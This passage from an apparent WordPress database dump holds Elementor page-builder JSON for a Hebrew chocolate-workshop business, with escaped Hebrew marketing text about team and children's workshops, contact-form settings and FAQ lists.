\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1189,239,'_elementor_version','0.4'),(1190,239,'_elementor_template_type','post'),(1198,123,'_elementor_template_type','wp-post'),(1200,241,'_wp_page_template','elementor_header_footer'),(1201,241,'_elementor_edit_mode','builder'),(1202,241,'_elementor_data','[{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1203,241,'_elementor_version','0.4'),(1204,241,'_elementor_template_type','post'),(1212,46,'_elementor_template_type','wp-post'),(1214,243,'_wp_page_template','elementor_header_footer'),(1215,243,'_elementor_edit_mode','builder'),(1216,243,'_elementor_data','[{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd 